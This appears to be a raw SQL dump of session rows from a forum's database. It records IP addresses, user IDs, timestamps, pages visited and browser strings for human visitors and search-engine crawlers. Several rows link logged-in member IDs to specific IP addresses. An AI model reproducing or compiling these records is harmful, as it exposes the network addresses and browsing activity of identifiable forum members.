('18dd42ff1bfc40097c706832c98ea052', 0, '185.100.87.63', 'c293ea94af4f41a05a92959e08b0f62a', 1465384047, '/search.php', 'Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2e688de61159c8231e68cafd5505322', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465385406, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('89adf3b012d1b7275dfae883694046d8', 0, '197.211.39.84', '9c059456a6c274cd1868f8d14da33e27', 1465386211, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db3195261fa9e664e3c55578d05b58d0', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465387116, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('049c219a76fa8017a31cc55122b3e9bd', 0, '141.89.226.146', 'e463918a4a381b3c43380d279849bd51', 1465388445, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('023d716ae83c1ec33675d48c7f82b7b5', 0, '37.59.13.68', '0e1ddf8875a57476cb35c207a9a51307', 1465388950, '/showthread.php?p=3046', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f237478b355cce1f811ce7a9957a19c4', 0, '46.109.101.129', '19db54e0943bf57d5585065f3d21781a', 1465392634, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e34a63d5b2fb3d95494195084600561', 0, '78.167.68.58', 'df63eeffd21f01141feebbec7c9c0873', 1465392765, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ee953b24af9f075b80f4f606cfd2677', 0, '40.77.167.56', 'c5490a5a8e1813ac25cf9e19091dcb85', 1465392967, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('39bad76724c84250cc34f6f6fcb73c80', 0, '93.191.18.38', 'f4369619cb18e68ba4f45081f5c98660', 1465393125, '/showthread.php?p=3005', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.76 YaBrowser', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef617e74feeefa899b0746c17e641081', 0, '188.116.190.6', '47214f0b27e0963e9610817b905ba780', 1465393238, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71652c864f3900ac10c559d28aee2af3', 0, '93.191.18.38', '648a21be19685a8d429399c81640d44a', 1465393131, '/showthread.php?p=3005', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e98484f029d16e1d0a92eb913dd9fe17', 0, '172.68.11.246', 'a732e9f85f9f640851a26bfdd6f6ad16', 1465393155, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f20b7f1ada63a51992bb2b622746c835', 0, '109.188.126.23', 'bc873f2b81f47a70566d9f176a79989f', 1465393243, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1376935a65e69a6c9550141480c51e8', 0, '5.254.65.134', '3c9827e8fb38b3baa0ade3145224825f', 1465393248, '/showthread.php?p=3005', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa0198f1218cb28e79348f13349e24ce', 0, '172.68.10.237', '3a5734b92571f61a7176f2dccd8034b2', 1465393298, '/showthread.php?p=3005', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3890ef3c19429a0887ff7a42e5846e52', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465393436, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a1cdcd1f0f3482e331e02f9327022803', 308, '148.103.39.120', '6c0f16fe6a40027bc52023f47e7ef3a6', 1465393761, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('208d19771ace0154e487777ad32f07db', 0, '188.162.166.152', '60e09f410c744b6c68d03f64c093bea8', 1465394584, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('34c6d5af4ef5f08724e6496b728db486', 0, '172.68.11.249', 'c3b1702e7067859e23af8e55b55fe879', 1465394647, '/showthread.php?p=3005', 'Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrom', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a26ac371a02e09620e713df6827344eb', 161, '172.68.29.181', '9a23805a733ff0e56cb591cfab7efb9f', 1465394916, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('d637e21b37f312d06bfaaa5062626d74', 0, '157.55.39.146', '23f3103f44bc3badcba53554e5e4cb6d', 1468156589, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d6d0f50bd2e7f547906932a88d723fe5', 0, '199.195.193.10', 'a29a1e0de905851e49b049c6a4780455', 1465397388, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2729.4 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a7218dd4c2b56ade64c7bd739957170', 0, '220.181.132.196', 'a7bcf9a5b094f89256723e66b20965eb', 1465397486, '/index.php?', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('458b59ff50cdf0a5ea80e37d08f55872', 0, '86.105.55.37', '096a1b69ba0cc20359fdb67b627a585b', 1465397527, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1b9e01f0e9516bd63e93be2e3e4f8b6e', 0, '109.67.116.115', 'c1441cf111a245c993c071123dc23fdd', 1465397604, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e4b812bbba2fc906f3fea73afd74911', 0, '220.181.132.197', 'a7bcf9a5b094f89256723e66b20965eb', 1465397663, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9925d0b659021fc35a49c6e42aa3d18a', 0, '89.238.186.147', 'c4f87c4bd186ff253fafc5f2bac41c1d', 1465398201, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd6da2a8103eaca50b73a29143b8ef89', 0, '172.68.11.246', '13a68e99040cb26293d6d3698915f05e', 1465400855, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7aff6e796170659ee529a8f4b97a6b09', 0, '157.55.39.177', '23f3103f44bc3badcba53554e5e4cb6d', 1465401513, '/faq.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('401afb2772799af13d13897bf07da39f', 0, '88.133.162.90', 'b17a89db17e7254e18fb6b291274372e', 1465401832, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dd999883ae677d46f047b9cd614293b0', 0, '24.37.95.162', '053b263ab27cda2f5b94868c76cd6af6', 1465404513, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('02e53d8f12d5b2bdc341d645784d7a78', 0, '172.68.10.241', '37f97e76327fadd83b40baa1af41d596', 1465404802, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9a67d6dcdb6db710b1d20e8b8809e7e', 0, '93.80.51.220', '3102b0b808898db736e1b57dcc72be56', 1465405277, '/showthread.php?p=2927', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3388373a9e30360603c8133eb0d225f1', 0, '88.0.14.84', '78060282e285cdc196cf343d4685a59b', 1465412453, '/showthread.php?p=3046', 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('796864b829e696603837f701320a7f4e', 0, '88.76.230.138', '65821fa0a0d0665f6911160c15a703b2', 1465408067, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d97edd68ca7d996fb887276752c6db44', 0, '172.68.10.204', '0f2211532877dc307c4ea0c06cc5f149', 1465411244, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('49ddf57355a3a63901d8c3111e52f25c', 0, '217.69.133.68', 'adec92f43af45575d1a28ddcb0eea331', 1465492574, '/showthread.php?p=3021', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52a678d73402b78ceb0d7a0214727982', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465412092, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('de0abbef2e00a7a93cf59009c94c8d65', 0, '186.179.156.169', '8adcbe1d2f0d5fc41eff52f449f3cbdb', 1465412823, '/faq.php', 'Mozilla/5.0 (Linux; Android 5.0; SM-G900H Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrom', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9dca64fe129eab8d5fa92fd74d926449', 0, '2a02:598:a::78:', '9cf63c5b04e3ee4314b211df79523bdb', 1473730746, '/memberlist.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4199d790ef0483dd8f4f0ff07e09f463', 0, '81.5.108.225', '5078820f7db9ae618120de34fb893f47', 1465414509, '/showthread.php?p=3005', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('399eea3541be3a8a9fb0369df6bbabc3', 0, '173.254.250.36', '82d549ce6e27d573da74dab59ebbbecc', 1465415953, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('31b0a76e4466fe36bc251a38a0ab7e55', 384, '37.48.85.25', 'ca2599fd0d44ba914a6fa0a3dac8ae31', 1465419989, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('d0dd541b73fde87ca9afae045805f776', 0, '154.118.16.83', 'df193054c4dbc8e1c224cb11474c4b1b', 1465421238, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0b4153f38a6da29a856bd33670dfece', 0, '172.68.10.245', '258d898816e5ed0de1a6f7a778e30b1c', 1465422569, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c00317d7cc9af13d0c008fe0a35d723d', 0, '199.59.148.209', '4b4ee0203c0f40a032f0bff548803b25', 1475260102, '/showthread.php?p=2995', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('915f7a84de242dec0d55a15001029b06', 0, '172.68.11.237', '90ed18c3140808a78a34ab116941ba05', 1465423624, '/showthread.php?p=3005', 'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a083132997fb5f73bef932f16c21a20', 0, '172.68.11.244', 'a378a00f148c2672a781f27f4f602717', 1465425542, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6c06064943306da81b155bc4852037a', 0, '66.249.69.173', 'dce73380cf0fd3aff82da93d9252bb04', 1468235852, '/showthread.php?p=2956', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6bdb8a92f4f5a10d62263a360025c7d5', 0, '192.173.144.35', 'fa3a492ae44b537ae40b134fda4fa7d1', 1465428872, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d1c2e8ed3819fa4c5fa1a473622b8a1d', 0, '82.41.153.60', 'b4ce2974a98ba70bfcec5aaa4e4c8a10', 1465429097, '/showthread.php?t=2346', 'Mozilla/5.0 (Linux; Android 5.0; E2303 Build/26.1.A.3.111) AppleWebKit/537.36 (KHTML, like Gecko) Ch', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7d531a32cadeed47d0c6b110b3d8c13', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465431568, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('1acb6347d64d310885c592a3c162e4d7', 0, '50.26.144.65', 'b548e8576539436448e644f7b5d37e4f', 1465433273, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('055d5a173dfa7f71cc835c2de7d2b888', 0, '72.52.75.27', '043d59d1cd21ce3e2cc7c380ca3f4295', 1465433440, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('05bfd01e91fe09821dfbf2586324d282', 0, '37.48.80.101', '7a1ca3bebb58c17c7324d66bf0ba7532', 1465436256, '/index.php', 'Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18552b7a46f7472ae7d1f5167a98ceb5', 0, '66.249.64.61', '881de0811167d68e6f4733be9b8109c2', 1465443875, '/archive/index.php/t-2390.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('2d3f45a8510bdcf09fc94f76e3879997', 0, '66.249.64.81', '881de0811167d68e6f4733be9b8109c2', 1465440733, '/showthread.php?p=2801', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e4aa73abd788c3aed2a59631e3568ac', 0, '66.249.64.160', '881de0811167d68e6f4733be9b8109c2', 1467775369, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('dc03dd954bf34ebda023b271dce2e664', 0, '66.249.64.76', '881de0811167d68e6f4733be9b8109c2', 1466744277, '/member.php?u=302', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc652c76a240d472eae495298a1a63b0', 0, '66.249.64.178', '881de0811167d68e6f4733be9b8109c2', 1467796800, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('245054f893bffa12db0e297e04250464', 0, '66.249.64.166', '881de0811167d68e6f4733be9b8109c2', 1467797540, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be9dcd7085ffde5f5e374b36063c807d', 0, '66.249.64.173', '881de0811167d68e6f4733be9b8109c2', 1467809411, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f76c35a72cbd2bb34a6923ee775304ed', 0, '180.180.107.197', '480c367d31cd15c44cbec46dab9cd161', 1465441993, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('85cd45d40f707545dc7eb4ef06f4d7eb', 0, '66.249.64.183', '881de0811167d68e6f4733be9b8109c2', 1467809410, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e614b72edf0f0bfd0214eb877df709d5', 0, '70.32.38.68', 'f74027a4ebbde383858d90585bfbbee4', 1465444995, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4ed754b71edf58988d420873cbf95dd5', 0, '66.249.64.198', '881de0811167d68e6f4733be9b8109c2', 1465447552, '/showthread.php?p=2957', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('06b0df0fb09fa93c29a4ba79d7864ed0', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465451640, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8ddcd78eaa018c9fd018c94589963ea0', 0, '41.68.201.40', '147f38209fd6c5cb463570861d1ecb12', 1465451654, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9acc917212a95b7abf6ca44b98ca03f5', 0, '199.241.200.197', '2a29e7b49a6e176f084de9f79fb88204', 1465453376, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) min/1.2.2 Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1cf48b408ade4c40429ae2728e7f7b2', 0, '188.146.139.224', '754010e5875d1c54ff4675482fbce4f5', 1465453402, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c3b34c9ff9261e0b7d916574f24f2d6f', 0, '86.49.188.246', '737e38c3f2d7c82c924205bdcf0dfbd0', 1465455186, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd48b6c1e9ec985bc5816049d56856bf', 0, '172.68.10.201', 'a6cb8a15c5b34e9f7454ac194865430e', 1465456042, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f90dceeef81b121bf66c49d70d2cbce1', 0, '88.86.78.178', '737407d7631b8969b7ead216bf639e79', 1465456811, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4dd2e2eadd4be64f5222012be005d12c', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465458087, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('2bcb55ca67635774b1d89a2d129036f2', 0, '110.174.175.44', 'a963a1b573e05407829912fe5e84e66c', 1465458380, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e33c1d37c3d28de750a490fc5b4362ce', 0, '89.96.100.69', 'b516828d74995a1506035f9092823ff3', 1465459464, '/showthread.php?t=1196', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71c4ec2ac7f85607ecab62d869270457', 0, '176.33.15.201', 'ff40e8658c39c7dae13f29820b956224', 1465463596, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9941c491ea5a0e4d781b202a9579d89a', 0, '85.25.103.69', 'eb4373142bce461b8290b3db91c10f9b', 1465464134, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6299f2f608b438ba52e798a6e04b4bab', 0, '66.249.64.166', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466775906, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9694af42f34c49b10c6652066f9157e', 0, '188.166.64.217', '08edea487a40264c384533c2216b3399', 1465470048, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('09a7f2b185f73f0a001a3719785093a3', 0, '157.55.39.88', '23f3103f44bc3badcba53554e5e4cb6d', 1465470178, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3b5f7ef27121350ab74cae8abbd92285', 0, '157.55.39.30', '23f3103f44bc3badcba53554e5e4cb6d', 1465470181, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b0bae54862b7b895a6cb4f75398bd9e2', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465472097, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ef97265fd203ebc00abd0e7c64f6ae45', 178, '104.46.63.164', '35429d29bb7b1da6447e58780cac2522', 1465474730, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('3cdffadc73d77e413b710717d99d674b', 0, '92.216.147.85', '991ff58022b0fa17747fa2ddb8cddc74', 1465475569, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('602814b6a18270edb31d172914efef95', 0, '85.100.189.220', '179840126bfa5b5ab9ed4dccf7266454', 1465476666, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('154ed08bcadad4693b2e423e9e7f2e1e', 0, '79.116.151.9', '899d24c28ed565aa37e001ad82b6484e', 1465479146, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7d4fcbd377f92f18fc52f903fb4798d4', 0, '2a02:598:a::78:', '973039ebce5438c56590af99930cc2a7', 1465479509, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('078546a975504ff123b064dd28af9c3b', 0, '196.217.17.121', '0ec82c6c92c40a36c030dd45d324d651', 1465531891, '/showthread.php?p=3045', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4499259ddb858867af5cde097c603d35', 0, '83.167.223.242', '8558710b4319a8a5191169a42be7af1b', 1465540681, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8af881c7a48c2c9e255161622f066979', 0, '209.95.50.148', '8fe1ac28f1f2603a1a14ab71a906baec', 1465481237, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('65c54c4f364525444f95ff1c063cd954', 0, '165.117.254.250', 'efdf8b47e461499fb0f3ba9b5f0b54e3', 1465481867, '/member.php?u=33', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
